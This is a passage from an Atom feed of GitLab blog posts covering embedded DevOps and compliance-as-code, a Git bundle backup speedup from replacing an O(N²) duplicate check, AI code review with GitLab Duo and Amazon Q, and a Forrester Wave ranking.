<li><strong>Redundant development</strong>: Multiple teams solve identical problems, creating inconsistencies</li>
<li><strong>Late-stage discovery during big-bang integrations</strong>: Problems are found late in the process when multiple developers integrate their code at once, when errors are more costly to fix</li>
<li><strong>Stifled innovation</strong>: Solutions from one domain rarely influence others, hampering the development of new product ideas</li>
</ul>
<h3>Solution: Collaborative engineering through a unified platform</h3>
<p>An important step in breaking down these silos is to standardize embedded development around GitLab’s unified DevSecOps platform. In this regard, GitLab is aligned with the broader shift toward more consolidated, shared platforms on embedded devices. GitLab enables:</p>
<ul>
<li><strong>Shared visibility:</strong> Make all code, Issues, and documentation visible across teams</li>
<li><strong>Collaborative workflows:</strong> Enable peer review and knowledge sharing through merge requests</li>
<li><strong>Centralized knowledge:</strong> Maintain a single source of truth for all development artifacts</li>
<li><strong>Asynchronous collaboration:</strong> Allow teams to work together across different locations and time zones</li>
</ul>
<p>Human-AI agent collaboration is a fundamental ingredient in fueling the customer-facing innovations that digital natives and established embedded brands desire, and GitLab enables human-AI collaboration as well. By creating transparency across the development lifecycle, GitLab changes embedded development from an isolated activity into a collaborative practice. Engineers can see each other's work in progress, learn from collective experiences, and build upon shared solutions.</p>
<p>Watch this presentation from Embedded World Germany 2025, which explains the power of embedded developers collaborating and sharing “work in progress”. The demo portion from 24:42 to 36:51 shows how to integrate HIL into a GitLab CI pipeline and enable collaborative development.</p>
<figure class="video_container">
<iframe src="https://www.youtube.com/embed/F_rlOyq0hzc?si=eF4alDY6HK98uZPj" frameborder="0" allowfullscreen="true"></iframe>
</figure>
<p>Perhaps most importantly, by achieving greater collaboration through DevSecOps, teams can unlock embedded systems innovations that would otherwise remain hidden. Indeed, collaboration fuels innovation. <a href="https://www.sciencedirect.com/science/article/abs/pii/S0749597800928887">One study</a>, for example, found that group brainstorming, when properly structured, can lead to more innovative and creative outcomes than individuals working alone. Collaborative development is crucial in the race to develop software-defined products.</p>
<h2>Challenge 4: Manual functional safety compliance processes</h2>
<p>Embedded systems in the automotive and aerospace industries must comply with rigorous functional safety standards, including ISO 26262, MISRA C/C++, DO-178C, and DO-254. Traditional compliance approaches involve manual reviews, extensive documentation, and separate verification activities that occur late in the development cycle, which often creates security review bottlenecks. When specialized embedded security and code quality scanners detect vulnerabilities in a developer’s code, each finding joins a backlog of unresolved issues. Developers can’t integrate their code, and security personnel need to wade through that backlog of code violations. This creates delays and makes compliance more difficult.</p>
<p>Some of the challenges can best be summed up as:</p>
<ul>
<li><strong>Late-stage compliance issues</strong>: Problems discovered after development is complete</li>
<li><strong>Documentation burden</strong>: Extensive manual effort to create and maintain compliance evidence</li>
<li><strong>Process bottlenecks</strong>: Serial compliance activities that block development progress</li>
<li><strong>Expertise dependence</strong>: Reliance on limited specialists for compliance activities</li>
</ul>
<p>As a result, teams often need to choose between velocity and compliance — a precarious trade-off in safety-critical systems.</p>
<h3>Solution: Automated functional safety compliance workflow building blocks</h3>
<p>Rather than treating security and compliance as post-development verification activities, you can codify compliance requirements and enforce them automatically through <a href="https://about.gitlab.com/blog/introducing-custom-compliance-frameworks-in-gitlab/">customizable frameworks in GitLab</a>. To do this for functional safety standards, in particular, you can integrate GitLab with specialized embedded tools, which provide the depth of firmware scanning required by functional safety standards. Meanwhile, GitLab provides automated compliance checks, full audit trails, and merge request gating — all features needed to support a robust continuous compliance program.</p>
<p>This integrated approach includes:</p>
<ul>
<li><strong>Compliance-as-code:</strong> Define compliance requirements as automated checks</li>
<li><strong>Integrated specialized tools:</strong> Connect tools like CodeSonar into the DevSecOps platform for automotive-specific compliance</li>
<li><strong>Continuous compliance verification:</strong> Verify requirements throughout development</li>
<li><strong>Automated evidence collection:</strong> Gather compliance artifacts as a by-product of development</li>
</ul>
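<p>The compliance-as-code idea above can be sketched as a small gate that fails a pipeline when scanner findings violate a codified policy. The finding fields, rule names, and thresholds below are hypothetical illustrations, not a GitLab or scanner API.</p>
<pre><code class="language-python">from dataclasses import dataclass

@dataclass
class Finding:
    rule: str        # e.g., a MISRA C rule identifier (hypothetical)
    severity: str    # "blocker", "major", or "minor"

def check_compliance(findings, max_major=0):
    """Evaluate a codified policy: no blockers, at most max_major major findings."""
    blockers = [f for f in findings if f.severity == "blocker"]
    majors = [f for f in findings if f.severity == "major"]
    reasons = []
    if blockers:
        reasons.append(f"{len(blockers)} blocker finding(s), e.g. {blockers[0].rule}")
    if len(majors) > max_major:
        reasons.append(f"{len(majors)} major finding(s) exceed limit {max_major}")
    return (not reasons, reasons)

passed, reasons = check_compliance([
    Finding("MISRA-C:2012 Rule 17.7", "major"),
    Finding("MISRA-C:2012 Rule 9.1", "blocker"),
])
print(passed, reasons)
</code></pre>
<p>Wired into a merge request pipeline, a non-passing result would block the merge while the recorded reasons become part of the audit trail.</p>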
<p>Watch this video to learn how to use Custom Compliance Frameworks in GitLab to create your own compliance policies. You can create compliance policies related to any standard (e.g., ISO 26262) and automatically enforce those policies in GitLab.</p>
<figure class="video_container">
<iframe src="https://www.youtube.com/embed/S-FQjzSyVJw?si=0UdtGNuugLPG0SLL" frameborder="0" allowfullscreen="true"></iframe>
</figure>
<p>By shifting compliance left and embedding it within normal development workflows, you can maintain safety standards without sacrificing velocity. Automated checks catch issues early when they're easier and less expensive to fix, while continuous evidence collection reduces the documentation burden.</p>
<h2>Realizing the power of embedded DevOps</h2>
<p>Embedded development is changing fast. Teams that remain stuck in manual processes and isolated workflows will find themselves increasingly left behind, while those that embrace automated, collaborative practices will define the future of software-defined smart systems.</p>
<p>Explore our <a href="https://gitlab.com/guided-explorations/embedded/workshops/embedded-devops-workshop-refactoring-to-ci">Embedded DevOps Workshop</a> to start automating embedded development workflows with GitLab, or <a href="https://content.gitlab.com/viewer/0a35252831bd130f879b0725738f70ed">watch this presentation from GitLab's Field Chief Cloud Architect</a> to learn how leading organizations are bringing hardware-in-the-loop testing into continuous integration workflows to accelerate embedded development.</p>
<h2>Learn more</h2>
<ul>
<li><a href="https://content.gitlab.com/viewer/438451cba726dd017da7b95fd0fb1b59">Why GitLab Premium with Duo for embedded systems development?</a></li>
<li><a href="https://content.gitlab.com/viewer/87f5104c26720e2c0d73a6b377522a44">Why GitLab Ultimate with Duo for embedded systems development?</a></li>
<li><a href="https://content.gitlab.com/viewer/e59c40099d5e3c8f9307afb27c4a923f">More embedded development systems presentations from GitLab</a></li>
</ul>
]]></content>
        <author>
            <name>Matt DeLaney</name>
            <uri>https://about.gitlab.com/blog/authors/matt-delaney</uri>
        </author>
        <author>
            <name>Darwin Sanoy</name>
            <uri>https://about.gitlab.com/blog/authors/darwin-sanoy</uri>
        </author>
        <published>2025-06-05T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[How we decreased GitLab repo backup times from 48 hours to 41 minutes]]></title>
        <id>https://about.gitlab.com/blog/how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes/</id>
        <link href="https://about.gitlab.com/blog/how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes/"/>
        <updated>2025-06-05T00:00:00.000Z</updated>
<content type="html"><![CDATA[<p>Repository backups are a critical component of any robust disaster recovery strategy. However, as repositories grow in size, the process of creating reliable backups becomes increasingly challenging. Our own <a href="https://gitlab.com/gitlab-org/gitlab">Rails repository</a> was taking 48 hours to back up — forcing impossible choices between backup frequency and system performance. We wanted to tackle this issue for our customers and for our own users internally.</p>
<p>Ultimately, we traced the issue to a 15-year-old Git function with O(N²) complexity and fixed it with an algorithmic change, <strong>reducing backup times by orders of magnitude</strong>. The result: lower costs, reduced risk, and backup strategies that actually scale with your codebase.</p>
<p>This turned out to be a Git scalability issue that affects anyone with large repositories. Here's how we tracked it down and fixed it.</p>
<h2>Backup at scale</h2>
<p>First, let's look at the problem. As organizations scale their repositories and backups grow more complex, here are some of the challenges they can face:</p>
<ul>
<li><strong>Time-prohibitive backups:</strong> For very large repositories, creating a repository backup could take several hours, which can hinder the ability to schedule regular backups.</li>
<li><strong>Resource intensity:</strong> Extended backup processes can consume substantial server resources, potentially impacting other operations.</li>
<li><strong>Backup windows:</strong> Finding adequate maintenance windows for such lengthy processes can be difficult for teams running 24/7 operations.</li>
<li><strong>Increased failure risk:</strong> Long-running processes are more susceptible to interruptions from network issues, server restarts, and system errors, which can force teams to restart the entire lengthy backup process from scratch.</li>
<li><strong>Race conditions:</strong> Because it takes a long time to create a backup, the repository might have changed a lot during the process, potentially creating an invalid backup or interrupting the backup because objects are no longer available.</li>
</ul>
<p>These challenges can lead to compromising on backup frequency or completeness – an unacceptable trade-off when it comes to data protection. Extended backup windows can force customers into workarounds. Some might adopt external tooling, while others might reduce backup frequency, resulting in potentially inconsistent data protection strategies across organizations.</p>
<p>Now, let's dig into how we identified a performance bottleneck, found a resolution, and deployed it to help cut backup times.</p>
<h2>The technical challenge</h2>
<p>GitLab's repository backup functionality relies on the <a href="https://git-scm.com/docs/git-bundle"><code>git bundle create</code></a> command, which captures a complete snapshot of a repository, including all objects and references like branches and tags. This bundle serves as a restoration point for recreating the repository in its exact state.</p>
<p>However, the implementation of the command suffered from poor scalability related to reference count, creating a performance bottleneck. As repositories accumulated more references, processing time increased quadratically. In our largest repositories containing millions of references, backup operations could extend beyond 48 hours.</p>
<h3>Root cause analysis</h3>
<p>To identify the root cause of this performance bottleneck, we analyzed a flame graph of the command during execution.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097176/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097176388.jpg" alt="Flame graph showing command during execution"></p>
<p>A flame graph displays the execution path of a command through its stack trace. Each bar corresponds to a function in the code, with the bar's width indicating how much time the command spent executing within that particular function.</p>
<p>When examining the flame graph of <code>git bundle create</code> running on a repository with 10,000 references, approximately 80% of the execution time is consumed by the <code>object_array_remove_duplicates()</code> function. This function was introduced to Git in the <a href="https://gitlab.com/gitlab-org/git/-/commit/b2a6d1c686">commit b2a6d1c686</a> (bundle: allow the same ref to be given more than once, 2009-01-17).</p>
<p>To understand this change, it's important to know that <code>git bundle create</code> allows users to specify which references to include in the bundle. For complete repository bundles, the <code>--all</code> flag packages all references.</p>
<p>The commit addressed a problem where users providing duplicate references through the command line – such as <code>git bundle create main.bundle main main</code> – would create a bundle without properly handling the duplicated <code>main</code> reference. Unbundling such a bundle would fail because Git tries to write the same ref twice. The code added to avoid duplication uses nested <code>for</code> loops that iterate through all references to identify duplicates. This O(N²) algorithm becomes a significant performance bottleneck in repositories with large reference counts, consuming substantial processing time.</p>
<h3>The fix: From O(N²) to efficient mapping</h3>
<p>To resolve this performance issue, we contributed an upstream fix to Git that replaces the nested loops with a map data structure. Each reference is added to the map, which automatically ensures only a single copy of each reference is retained for processing.</p>
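<p>The algorithmic change can be illustrated in Python (the actual fix is in C, inside Git's bundle code): replace a nested-loop duplicate scan with a map-style structure that keeps one copy of each ref.</p>
<pre><code class="language-python">def dedup_quadratic(refs):
    """O(N^2): for each ref, linearly scan all previously kept refs."""
    kept = []
    for ref in refs:
        if ref not in kept:      # linear scan makes the whole loop quadratic
            kept.append(ref)
    return kept

def dedup_with_map(refs):
    """Roughly O(N): a dict (hash map) remembers refs already seen."""
    seen = {}
    for ref in refs:
        seen.setdefault(ref, True)
    return list(seen)            # Python dicts preserve insertion order

refs = ["refs/heads/main", "refs/tags/v1.0", "refs/heads/main"]
print(dedup_with_map(refs))
</code></pre>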
<p>This change dramatically enhances the performance of <code>git bundle create</code> and enables much better scalability in repositories with large reference counts. Benchmark testing on a repository with 100,000 references demonstrates a 6x performance improvement.</p>
<pre><code class="language-shell">Benchmark 1: bundle (refcount = 100000, revision = master)
  Time (mean ± σ):     14.653 s ±  0.203 s    [User: 13.940 s, System: 0.762 s]
  Range (min … max):   14.237 s … 14.920 s    10 runs

Benchmark 2: bundle (refcount = 100000, revision = HEAD)
  Time (mean ± σ):      2.394 s ±  0.023 s    [User: 1.684 s, System: 0.798 s]
  Range (min … max):    2.364 s …  2.425 s    10 runs

Summary
  bundle (refcount = 100000, revision = HEAD) ran
    6.12 ± 0.10 times faster than bundle (refcount = 100000, revision = master)
</code></pre>
<p>The patch was accepted and <a href="https://gitlab.com/gitlab-org/git/-/commit/bb74c0abbc31da35be52999569ea481ebd149d1d">merged</a> into upstream Git. At GitLab, we backported this fix to ensure our customers could benefit immediately, without waiting for the next Git release.</p>
<h2>The result: Dramatically decreased backup times</h2>
<p>The performance gains from this improvement have been nothing short of transformative:</p>
<ul>
<li><strong>From 48 hours to 41 minutes:</strong> Creating a backup of our largest repository (<code>gitlab-org/gitlab</code>) now takes just 1.4% of the original time.</li>
<li><strong>Consistent performance:</strong> The improvement scales reliably across repository sizes.</li>
<li><strong>Resource efficiency:</strong> We significantly reduced server load during backup operations.</li>
<li><strong>Broader applicability:</strong> While backup creation sees the most dramatic improvement, all bundle-based operations that operate on many references benefit.</li>
</ul>
<h2>What this means for GitLab customers</h2>
<p>For GitLab customers, this enhancement delivers immediate and tangible benefits on how organizations approach repository backup and disaster recovery planning:</p>
<ul>
<li><strong>Transformed backup strategies</strong>
<ul>
<li>Enterprise teams can establish comprehensive nightly schedules without impacting development workflows or requiring extensive backup windows.</li>
<li>Backups can now run seamlessly in the background on nightly schedules, instead of requiring dedicated, lengthy maintenance windows.</li>
</ul>
</li>
<li><strong>Enhanced business continuity</strong>
<ul>
<li>With backup times reduced from days to minutes, organizations significantly minimize their recovery point objectives (RPO). This translates to reduced business risk – in a disaster scenario, you're potentially recovering hours of work instead of days.</li>
</ul>
</li>
<li><strong>Reduced operational overhead</strong>
<ul>
<li>Less server resource consumption and shorter maintenance windows.</li>
<li>Shorter backup windows mean reduced compute costs, especially in cloud environments, where extended processing time translates directly to higher bills.</li>
</ul>
</li>
<li><strong>Future-proofed infrastructure</strong>
<ul>
<li>Growing repositories no longer force difficult choices between backup frequency and system performance.</li>
<li>As your codebase expands, your backup strategy can scale seamlessly alongside it.</li>
</ul>
</li>
</ul>
<p>Organizations can now implement more robust backup strategies without compromising on performance or completeness. What was once a challenging trade-off has become a straightforward operational practice.</p>
<p>Starting with the <a href="https://about.gitlab.com/releases/2025/05/15/gitlab-18-0-released/">GitLab 18.0</a> release, all GitLab customers, regardless of license tier, can take full advantage of these improvements in their <a href="https://docs.gitlab.com/administration/backup_restore/backup_gitlab/">backup</a> strategy and execution. No configuration changes are required.</p>
<h2>What's next</h2>
<p>This breakthrough is part of our ongoing commitment to scalable, enterprise-grade Git infrastructure. While the reduction in backup creation time from 48 hours to 41 minutes represents a significant milestone, we continue to identify and address performance bottlenecks throughout our stack.</p>
<p>We're particularly proud that this enhancement was contributed upstream to the Git project, benefiting not just GitLab users but the broader Git community. This collaborative approach to development ensures that improvements are thoroughly reviewed, widely tested, and available to all.</p>
<blockquote>
<p>Deep infrastructure work like this is how we approach performance at GitLab. Join the GitLab 18 virtual launch event to see what other fundamental improvements we're shipping. <a href="https://about.gitlab.com/eighteen/">Register today!</a></p>
</blockquote>
]]></content>
        <author>
            <name>Karthik Nayak</name>
            <uri>https://about.gitlab.com/blog/authors/karthik-nayak</uri>
        </author>
        <author>
            <name>Manuel Kraft</name>
            <uri>https://about.gitlab.com/blog/authors/manuel-kraft</uri>
        </author>
        <published>2025-06-05T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Accelerate code reviews with GitLab Duo and Amazon Q]]></title>
        <id>https://about.gitlab.com/blog/accelerate-code-reviews-with-gitlab-duo-and-amazon-q/</id>
        <link href="https://about.gitlab.com/blog/accelerate-code-reviews-with-gitlab-duo-and-amazon-q/"/>
        <updated>2025-06-02T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Code reviews are critical for catching bugs, improving code readability, and maintaining coding standards, but they can also be a major bottleneck in your workflow. When you're trying to ship features quickly, waiting for multiple team members to review your code can be frustrating. The back-and-forth discussions, the scheduling conflicts, and the time it takes to get everyone aligned can stretch what should be a simple review into days or even weeks.</p>
<p>Here's where <a href="https://about.gitlab.com/blog/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/">GitLab Duo with Amazon Q</a>, our new offering that delivers agentic AI throughout the software development lifecycle for AWS customers, comes in to transform your review process. This intelligent, AI-powered solution can perform comprehensive code reviews for you in a fraction of the time it would take your human colleagues. By leveraging advanced agentic AI capabilities, GitLab Duo with Amazon Q streamlines your entire review workflow without sacrificing the quality and thoroughness you need. Think of it as having an always-available, highly skilled reviewer who can instantly analyze your code and provide actionable feedback.</p>
<h2>How it works: Launching a code review</h2>
<p>So how does GitLab Duo with Amazon Q actually work? Let's say you've just finished working on a feature and created a merge request with multiple code updates. Instead of pinging your teammates and waiting for their availability, you simply enter a quick command in the comment section: &quot;/q review&quot;. That's it – that short command triggers the AI to spring into action.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1750097002/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750097002096.png" alt="Triggering a code review using GitLab Duo with Amazon Q"></p>
<p>Once you've entered the command, Amazon Q Service immediately begins analyzing your code changes. You'll see a confirmation that the review is underway, and within moments, the AI is examining every line of your updates, checking for potential issues across multiple dimensions.</p>
<p>When the review completes, you receive comprehensive feedback that covers all the bases: bug detection, readability improvements, syntax errors, and adherence to your team's coding standards. The AI doesn't just point out problems, it provides context and suggestions for fixing them, making it easy for you to understand what needs attention and why.</p>
<p>The beauty of this agentic AI approach is that it handles the heavy lifting of code review while you focus on what matters most: building great software. You get the benefits of thorough code reviews — better bug detection, consistent coding standards, and improved code quality — without the time sink. Your deployment times shrink dramatically because you're no longer waiting in review queues, and your entire team becomes more productive.</p>
<h2>Why use GitLab Duo with Amazon Q?</h2>
<p>GitLab Duo with Amazon Q transforms your development workflow in the following ways:</p>
<ul>
<li>Lightning-fast code reviews that don't compromise on quality</li>
<li>Consistent application of coding standards across your entire codebase</li>
<li>Immediate feedback that helps you fix issues before they reach production</li>
<li>Reduced deployment times that let you ship features faster</li>
<li>More time for your team to focus on creative problem-solving instead of repetitive reviews</li>
</ul>
<p>Ready to see this game-changing feature in action? Watch how GitLab Duo with Amazon Q can revolutionize your code review process:</p>
<figure class="video_container">
<iframe src="https://www.youtube.com/embed/4gFIgyFc02Q?si=GXVz--AIrWiwzf-I" frameborder="0" allowfullscreen="true"></iframe>
</figure>
<blockquote>
<p>To learn more about GitLab Duo with Amazon Q visit us at an upcoming <a href="https://about.gitlab.com/events/aws-summits/">AWS Summit in a city near you</a> or <a href="https://about.gitlab.com/partners/technology-partners/aws/#form">reach out to your GitLab representative</a>.</p>
<p>And make sure to join the GitLab 18 virtual launch event to learn about our agentic AI plans and more. <a href="https://about.gitlab.com/eighteen/">Register today!</a></p>
</blockquote>
]]></content>
        <author>
            <name>Cesar Saavedra</name>
            <uri>https://about.gitlab.com/blog/authors/cesar-saavedra</uri>
        </author>
        <published>2025-06-02T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[GitLab named a Leader in The Forrester Wave™: DevOps Platforms, Q2 2025]]></title>
        <id>https://about.gitlab.com/blog/gitlab-named-a-leader-in-the-forrester-wave-devops-platforms-q2-2025/</id>
        <link href="https://about.gitlab.com/blog/gitlab-named-a-leader-in-the-forrester-wave-devops-platforms-q2-2025/"/>
        <updated>2025-06-02T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Choosing a DevSecOps platform is one of the biggest technology decisions enterprises make. That's why we are thrilled to be named a <a href="https://about.gitlab.com/forrester-wave-devops-platform/"><strong>Leader in The Forrester Wave™: DevOps Platforms, Q2 2025</strong></a>, receiving the highest scores possible across the criteria our customers tell us they care about most, including day zero experience, developer tooling, build automation and CI, deployment automation, AI risk mitigation, AI infusion, directly incorporated security tools, and platform cohesion.</p>
<p><em><strong>&quot;GitLab is the most all-in-one of the all-in-one solutions and suits enterprises looking to standardize with a single purchase.&quot; -</strong></em> Forrester Wave™: DevOps Platforms, Q2 2025</p>
<p>For us, this recognition reflects what we've been hearing from customers: They need to deliver secure software faster, but existing solutions force them to compromise on speed, security, or simplicity. GitLab delivers all three. And with our <a href="https://about.gitlab.com/releases/2025/05/15/gitlab-18-0-released/">GitLab 18.0 release</a> in May, we’ve taken this a step further by <a href="https://about.gitlab.com/blog/gitlab-premium-with-duo/">including AI-native GitLab Duo capabilities</a> — such as test generation, code suggestions, and code refactoring — directly in GitLab Premium and GitLab Ultimate at no additional cost.</p>
<blockquote>
<p><a href="https://about.gitlab.com/forrester-wave-devops-platform/">Access the report today!</a></p>
</blockquote>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673518/Blog/Content%20Images/Image_DevOps-Platforms-Q2-2025.png" alt=" Forrester Wave™: DevOps Platforms, Q2 2025 graphic "></p>
<h2>Staying at the forefront of AI transformation, with enterprise control</h2>
<p>DevSecOps is rapidly evolving, with AI at the forefront of that change. Unfortunately, many AI tools force a choice: cutting-edge capabilities or enterprise security.</p>
<p>Forrester scored GitLab a 5 – the highest on their scale – for both the <strong>AI infusion</strong> and <strong>AI risk mitigation</strong> criteria. We’re pleased to see our focus on building innovative AI capabilities that maintain security is being noticed by more than just our customers.</p>
<p>This dual strength shows up across our GitLab Duo AI offerings, including:</p>
<ul>
<li>Duo Workflow (private beta): Autonomous AI agents that handle complex tasks across development, security, and operations — with enterprise-grade guardrails and audit trails.</li>
<li>Agentic Chat: Contextual, conversational AI assistance for everything from code explanations to test creation — with IP protection and privacy controls built in.</li>
<li>Code Suggestions: AI assistance that can predictively complete code blocks, define function logic, generate tests, and propose common code like regex patterns.</li>
<li>AI-native Vulnerability Resolution: Find and fix vulnerabilities with auto explanation and auto-generated merge requests, ensuring a streamlined development process.</li>
</ul>
<h2>Doing more with less</h2>
<p>We’ve heard loud and clear that DevSecOps teams don’t need more tools and integrations that only cover part of their software delivery lifecycle. They need a seamless, integrated developer experience that covers the entire SDLC.</p>
<p>We believe GitLab’s scores in the following criteria are validation of our customer-focused strategy:</p>
<ul>
<li><strong>Day zero experience:</strong> Forrester cited our “strong day zero experience,” noting that “everything is ready to run out-of-the-box,” supported by extensive migration tools and tutorials.</li>
<li><strong>Developer tooling:</strong> Forrester pointed to <a href="https://about.gitlab.com/blog/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/">GitLab Duo with Amazon Q</a>, our agentic AI offering for AWS customers, as well as our cloud development environment, integrated developer platform, and wikis for documentation as examples.</li>
<li><strong>Project planning and alignment:</strong> Forrester noted our &quot;strong compliance center,&quot; and that we have tools to drive alignment top-down and bottom-up.</li>
<li><strong>Pipeline security:</strong> Forrester gave us the highest score possible in the pipeline security criterion.</li>
<li><strong>Build automation and CI:</strong> Forrester cited our build automation and CI with multistage build pipelines and strong self-hosted support.</li>
</ul>
<h2>Read the report</h2>
<p>For us, being named a Leader in The Forrester Wave™: DevOps Platforms, Q2 2025 speaks to the breadth and depth of our platform’s capabilities, providing a single source of truth for the entire software development lifecycle. No more juggling multiple tools and integrations – GitLab provides a seamless, integrated experience that boosts productivity and reduces friction. We believe this placement reflects the hard work of our team, the many contributions from GitLab’s open source community, the invaluable feedback from our customers, and our dedication to shaping the future of software development.</p>
<blockquote>
<h4><a href="https://about.gitlab.com/forrester-wave-devops-platform/">Access the report today!</a></h4>
</blockquote>
<p><em>Forrester does not endorse any company, product, brand, or service included in its research publications and does not advise any person to select the products or services of any company or brand based on the ratings included in such publications. Information is based on the best available resources. Opinions reflect judgment at the time and are subject to change. For more information, read about Forrester’s objectivity <a href="https://www.forrester.com/about-us/objectivity/">here</a>.</em></p>
]]></content>
        <author>
            <name>Dave Steer</name>
            <uri>https://about.gitlab.com/blog/authors/dave-steer</uri>
        </author>
        <published>2025-06-02T00:00:00.000Z</published>
    </entry>
</feed>